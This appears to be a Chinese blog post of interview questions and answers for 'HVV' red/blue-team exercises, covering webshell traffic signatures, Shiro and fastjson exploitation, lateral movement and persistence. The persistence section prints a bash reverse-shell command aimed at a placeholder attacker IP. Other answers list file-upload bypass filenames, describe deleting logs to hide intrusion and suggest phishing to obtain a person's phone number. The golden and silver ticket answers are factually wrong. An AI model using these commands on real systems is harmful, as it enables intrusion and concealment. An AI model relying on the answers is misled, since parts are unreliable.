2025国家护网HVV高频面试题总结来了04(题目+回答)

发布于:2025-03-05 ⋅ 阅读:(19) ⋅ 点赞:(0)

网络安全领域各种资源,学习文档,以及工具分享、前沿信息分享、POC、EXP分享。不定期分享各种好玩的项目及好用的工具,欢迎关注。

一、HVV行动面试题分类

根据面试题的内容,我们将其分为以下几类:

  • 漏洞利用与攻击技术

  • 防御与应急响应

  • 工具与流量特征  

  • 内网渗透与横向移动 

  • 溯源与反制 

  • 安全设备与日志分析

  • 权限维持与后渗透

  • 常见漏洞与利用方式 

  • 网络安全基础知识

二、分类解析与答案

漏洞利用与攻击技术

1:shiro的流量特征是什么?

Shiro的流量特征通常包括Cookie中的`rememberMe`字段,攻击者通过构造恶意的序列化数据,利用Shiro的反序列化漏洞进行攻击。常见的攻击流量中会包含`rememberMe`字段,且其值为经过AES加密的恶意序列化数据。

 2:fastjson不出网怎么利用?

当fastjson不出网时,可以通过以下方式利用:

- 将命令执行结果写入静态文件,然后通过其他方式读取。

- 使用DNSLog外带数据。

- 利用Commons-io写文件或植入Webshell。

- 通过BECL攻击导致命令执行或植入内存马。

3:Java内存马如何排查?

Java内存马通常通过Filter、Servlet、Listener等方式植入。

排查思路包括:

- 检查Filter、Servlet、Listener等组件的加载情况。

- 使用工具(如Arthas)动态排查内存中的可疑类。

- 对于冰蝎类型的内存马,可以通过分析JVM内存中的类加载情况,查找可疑的类名或方法。

4:讲下内存⻢排查思路?

- 首先判断是什么方式注入的内存马

- 可以通过查看web日志,以及看是否有类似哥斯拉、冰蝎的流量特征

- 如果web日志中没有发现,那么我们就可以排查中间件的error.log日志

防御与应急响应

1:内网爆出多条异常该怎么处理?

处理内网异常时,应按照以下步骤进行:

-隔离:立即隔离受感染的机器,防止横向扩散。

-分析:分析异常流量的来源和目的,确定攻击类型。

-修复:修复漏洞,清除恶意文件或进程。

- 监控:加强监控,确保攻击已被彻底清除。

2:如何判断文件上传告警是否为真实攻击?  

判断文件上传告警是否为真实攻击的步骤包括:

-分析文件内容:检查上传的文件是否为Webshell或其他恶意文件。

-检查请求来源:分析上传请求的IP地址和User-Agent,判断是否为恶意来源。

-验证漏洞:确认上传功能是否存在漏洞,是否可以被利用。

工具与流量特征

1:CS和MSF的流量特征是什么?

- Cobalt Strike (CS):CS的流量特征包括加密的HTTP/HTTPS通信,常见的URI路径如`/jquery-3.3.1.min.js`,以及Beacon的心跳包。

- Metasploit Framework (MSF):MSF的流量特征包括特定的URI路径(如`/meterpreter/reverse_tcp`),以及Meterpreter的加密通信。

 2:菜刀、蚁剑、冰蝎、哥斯拉的流量特征是什么?

- 蚁剑流量特征主要表现在数据包的加密方式和数据类型。蚁剑使用了AES加密算法对数据进行加密,同时还使用了自定义的二进制协议,在通信中传输各种类型的数据。

- 菜刀流量特征主要表现在HTTP协议上,使用HTTP协议通信,控制命令和数据都通过POST请求传输。因此,可以通过HTTP请求头中的User-Agent、Referer等信息进行识别,eval函数必不可少,有可能会被asser代替。

- 冰蝎流量特征主要表现在数据包中的特殊标记和传输的数据类型。冰蝎的数据包中包含了特定的标记,如"1ag=0x52415631",用于标识该数据包是冰蝎的控制命令。此外,冰蝎还使用了一种自定义的二进制协议,在通信中传输各种类型的数据

- 哥斯拉则流量特征主要表现在数据包的特殊标记和数据类型。哥斯拉的数据包中包含了特定的标记,如"XORHEAD"和"XORBODY",用于标识该数据包是哥斯拉的控制命令。此外,哥斯拉还使用了一种自定义的二进制协议,在通信中传输各种类型的数据。

内网渗透与横向移动

1:内网不出网怎么利用?

当内网不出网时,可以通过以下方式利用:

- SMB协议:利用SMB协议进行横向移动,如通过PsExec、WMI等工具。

- 代理转发:使用工具如frp、ngrok等进行端口转发,将内网服务暴露到外网。

- DNS隧道:通过DNS隧道进行数据传输,绕过网络限制。

2:如何判断二层网络FPP文件落地成功

判断FPP文件是否落地成功可以通过以下方式:

-网络抓包:使用Wireshark等工具抓取网络流量,分析是否有FPP文件的传输。

-日志分析:检查目标系统的日志,查看是否有文件写入的记录。

-文件校验:通过MD5或SHA1校验文件完整性,确认文件是否成功落地。

3:讲下黄金票据和白银票据?

-黄金票据:也称为“域管理员组帐户”,拥有黄金票据的用户可以访问域中所有计算机的本地管理员帐户,能够创建新的域管理员和更改现有的域管理员帐户密码

-白银票据:通常属于本地管理员帐户,只能访问本地计算机并执行特定任务。无法访问其他计算机或管理其他本地管理员帐户

-区别:

黄金票据通常指一个具有域管理员权限的票据,而白银票据通常指普通用户的票据

溯源与反制

1:如何溯源拿到手机号码?

溯源手机号码的步骤包括:

-分析日志:通过分析攻击流量的日志,查找攻击者的IP地址。

-关联信息:通过IP地址关联到攻击者的手机号码或其他个人信息。

-社工手段:通过社工手段(如钓鱼邮件)获取攻击者的手机号码。

2:如何判断SQL注入是否成功?

判断SQL注入是否成功可以通过以下方式:

-回显信息:查看页面是否返回数据库的错误信息或查询结果。

-延时注入:通过延时函数(如`sleep`)判断注入是否成功。

-布尔盲注:通过布尔逻辑判断注入是否成功。

安全设备与日志分析

1. 如何从海量告警中筛选出真实有效的攻击?

筛选真实攻击的步骤包括:

-告警分类:根据告警类型(如SQL注入、文件上传等)进行分类。

-流量分析:分析告警流量的来源、目的和内容,判断是否为恶意流量。

-误报排除:通过规则或人工分析排除误报,如扫描器流量、正常业务流量等。

2:如何分析Web日志?

Web日志分析的关键在于识别异常请求。可以通过分析HTTP状态码、请求频率、请求路径、User-Agent等信息,找出可疑的访问行为。常见的攻击特征包括SQL注入、XSS、文件上传等。

3:常用的渗透测试端口有哪些?

常用的渗透测试端口包括: 

- 22 (SSH)  

- 80 (HTTP)  

- 443 (HTTPS)  

- 445 (SMB)  

- 3389 (RDP)  

- 3306 (MySQL)  

- 8080 (HTTP Alt)

权限维持与后渗透

1:权限维持有哪些方式?

权限维持的常见方式包括:  

- 创建隐藏用户或后门账户  

- 植入Webshell或内存马  

- 利用计划任务或服务持久化  

- 使用黄金票据或白银票据进行Kerberos认证绕过

2:如何反弹Shell?

反弹Shell的常见方法包括使用Netcat、Bash、Python等工具。例如,使用`bash -i >& /dev/tcp/<攻击者IP>/<端口> 0>&1`命令可以将Shell反弹到攻击者的机器上。

3:如何清除渗透后的痕迹?

清除渗透痕迹的步骤包括:

- 删除日志:删除系统日志、Web日志、安全设备日志等。

- 清理文件:删除上传的Webshell、后门文件等。

- 恢复配置:恢复被修改的系统配置、服务配置等。

常见漏洞与利用方式

 1:SQL注入的原理是什么?

SQL注入是通过在用户输入中插入恶意的SQL代码,使得应用程序在执行数据库查询时执行这些恶意代码。攻击者可以通过SQL注入获取数据库中的敏感信息、修改数据、甚至控制整个数据库服务器。

2:文件上传的绕过方式有哪些?

文件上传的绕过方式包括: 

- 修改文件扩展名  

- 使用双扩展名(如`shell.php.jpg`)  

- 修改Content-Type  

- 利用文件头绕过检测  

- 使用空字节截断(如`shell.php%00.jpg`)

3:常见的未授权访问漏洞有哪些?

常见的未授权访问漏洞包括:

- Redis未授权访问:通过未授权访问Redis,获取敏感数据或执行命令。

- MongoDB未授权访问:通过未授权访问MongoDB,获取数据库内容。

- Elasticsearch未授权访问:通过未授权访问Elasticsearch,获取索引数据。

4:文件上传的绕过方式有哪些?

文件上传的绕过方式包括:

- 修改文件扩展名:将恶意文件扩展名改为允许上传的类型(如.jpg改为.php)。

- 修改Content-Type:将请求头中的Content-Type改为允许的类型(如image/jpeg)。

- 双写扩展名:通过双写扩展名绕过检测(如shell.php.jpg)

网络安全基础知识

1:什么是公钥基础设施(PKI)?

公钥基础设施(PKI)是一种基于公钥加密技术的安全框架,用于管理数字证书和公钥。PKI在网络安全中扮演着重要角色,主要用于身份验证、数据加密和数字签名。

2:正向代理和反向代理的区别是什么?

-正向代理:客户端通过代理服务器访问外部资源,代理服务器隐藏客户端的真实IP。 

-反向代理:客户端通过代理服务器访问内部资源,代理服务器隐藏后端服务器的真实IP。

3:HTTP状态码200、302、403、404分别表示什么?

-200 请求成功

-302跳转

-403 权限拒绝

-404 页面资源不存在

其他

1.:您有没有HVV经历?做的什么岗位?

2.:您参与过哪些项目?

3.:您看过哪些安全设备?

......

对于这类问题,如果缺乏实际经验,通常会被归为初级水平(除非在技术上表现特别出色)。因此,在回答时,你要尽可能详尽地展示自己对安全设备的理解,包括与之相关的硬件(HW)知识。同时,强调自己已经为此做了充分的准备,展现出对安全领域的热情和专注。

4:毕业了吗,那平时工作具体工作内容是什么?

已经毕业了;平常在公司,主要负责公司项目渗透测试、应急响应、安全加固、安全培训等工作。

5:平常有挖过src嘛?可以说说你的资产收集过程嘛?

-首先确定我们要挖的公司资产

-使用wps,新建一个exec表格,里面新建好几个表格,备注比如:根域名、子域名、小程序、app以及漏洞提交进度等情况

-上爱企查看这个企业的知识产权,然后看网站备案,然后看这个公司的股权穿透图,这里有一个找边缘资产的好方法,就是看股权穿透图找下面的子公司,但是不同的企业src收录标准不一

-使用小蓝本查该公司的一个小程序、app,然后保存在exec表格里面

-使用oneforall工具进行子域名挖掘,然后保存到一个txt里面,再使用灯塔进行子域名挖掘,再汇总,然后使用无影工具里面的辅助模块进行资产分类

-使用灯塔ARL自动化跑,去找一些文件泄露的漏洞

6:有自己的技术博客嘛,在先知、freebuf等平台发表过文章嘛?

都有,自己一直有保持写技术博文的习惯

7:你学校成绩如何有挂科吗?

学习成绩优秀,没有挂过科;在校期间获得多次校级奖学金以及各种荣誉;或者比赛相关成绩

8:未来你想做安全的哪一个领域?

目前的话还是打算先以贵公司实习为目的,然后以后打算安全的方向的话主要以渗透测试、安服、红蓝攻防这些方向靠。


网站公告

今日签到

点亮在社区的每一天
去签到